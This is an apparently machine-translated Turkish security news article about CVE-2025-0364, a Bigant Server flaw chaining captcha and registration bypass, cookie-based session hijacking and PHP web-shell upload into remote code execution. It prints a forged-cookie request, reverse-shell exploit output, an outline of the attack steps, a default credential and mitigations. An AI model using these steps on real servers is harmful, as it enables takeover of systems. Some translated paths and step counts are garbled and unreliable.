Bigant Server Güvenlik Açığı Saldırganların Kötü Amaçlı Kodu Uzaktan Çalıştırmasına İzin Verir


Bigantsoft’un Enterprise Chat Server yazılımındaki kritik bir güvenlik açığı, ~ 50 internete bakan sistemleri, yetkili olmayan uzaktan kod yürütme saldırılarına maruz bıraktı.

CVE-2025-0364 olarak adlandırılan bu istismar zinciri, saldırganların kimlik doğrulama protokollerini atlamasını, yönetici hesapları oluşturmasını ve Bigant Server v5.6.06 ve daha önceki savunmasız sunucularda kötü amaçlı PHP kodu yürütmesini sağlar.

CVE-2025-0364: PHP kodu yürütme için kimlik doğrulama baypas

Güvenlik açığı, Bigant Server’ın web arayüzündeki yanlış yapılandırılmış SaaS organizasyon kayıt özelliklerini kaldırır.

Saldırganlar, Captcha doğrulamasını ve/home/saaS/reg_email_post uç noktası aracılığıyla idari hesapları atlayarak, ThinkphP çerçevesinde zayıf oturum yönetimini kullanırlar.

Kayıt olduktan sonra saldırganlar, arka uç sistemlerine yetkilendirilmemiş erişimi ele geçirmek için oturum çerezlerini manipüle eder:

// Example of session hijacking via forced SaaS_ID assignment 

GET /index.php/Home/Login/index.html HTTP/1.1 

Cookie: saas=attacker_controlled_value 

Host: vulnerable-server.com

Bu çerez enjeksiyonu, saldırganların /data /gibi yollara PHP web kabuklarını yükledikleri yönetimsel bulut disk eklentisine erişim sağlıyor.[saas_id]/tava/[uuid]/Yyyy-mm-dd/malious.php.

Sunucu, sistem düzeyinde komut yürütmeyi etkinleştirerek kimlik doğrulama kontrolleri olmadan bu dosyaları yürütür.

Vulncheck’teki güvenlik araştırmacıları bunu ters kabuk yükü ile gösterdi:

# Exploit execution output showing SYSTEM privileges 

$ ./cve-2025-0364_linux-amd64 -rhost 10.0.0.104 -lhost 10.0.1.10 

[+] Requesting payload at: http://10.0.0.104:8000/data/[saas_id]/pan/[uuid]/2025-01-09/JQsaYCKEOu.php 

[+] Shell from 10.0.0.104:51690 

C:\Program Files\BigAntSoft\IM Console> whoami 

nt authority\system

Sömürü zinciri analizi

Saldırı 10 sıralı HTTP isteği gerektirir:

  1. Captcha bypass: 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833aC2547019a30 gibi 4 karakter captcha karmalarını çöz
  2. SaaS kaydı: Organizasyon verileriyle/home/saaS/reg_email_post adresine isteği sonrası
  3. Oturum manipülasyonu: Çerez başlığı üzerinden saldırgan kontrollü SaaS’a oturum atayın
  4. Uuid sızıntısı: /Demo sayfası hata ayıklama çıktılarından saas_id al
  5. Servis Etkinleştirme: Çalıntı UUID ile organizasyonu etkinleştirin
  6. Bulut Disk Auth Auth: Otomatik tarafından oluşturulan yönetici kimlik bilgilerini kullanarak kimlik doğrulaması
  7. Dosya Yükleme: PHP yükünü bulut sürücü dizinlerine yazın
  8. Yük tetikleyicisi: Http yüklenen php yoluna isteği al

Özellikle, sistem SaaS kimlik bilgilerini SYS_SAAS MySQL tablosundaki düz metin içinde varsayılan kimlik bilgilerini (root: www.upsoft01.com) kullanarak depolar ve veritabanları tehlikeye atılırsa tüm organizasyonel hesapları ortaya çıkarır.

Azaltma ve etki

Bigantsoft resmi bir yama yayınlamasa da, yöneticiler şunları yapmalıdır:

  1. .Htaccess Kuralları ile SaaS kaydını devre dışı bırakma/ev/saaS/uç noktalar
  2. Yetkisiz girişler için sys_saas tablosu denetim
  3. / Data / dizinlerden php yürütme izinlerini kaldırın

Vulncheck’in istismarı (GitHub: Vulncheck-OSS/CVE-2025-0364), sadece Mart 2025’te 15 sunucu tehlikeye girerek saldırıları hızlandırdı.

Bu güvenlik açığı, teminatsız kayıt iş akışlarını ayrıcalıklı dosya yönetim sistemleriyle birleştiren kurumsal sohbet platformlarında sistemik riskleri vurgulamaktadır.

4 Mart 2025 itibariyle maruz kalan büyük sunucuların% 72’si açılmamıştır.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.



Source link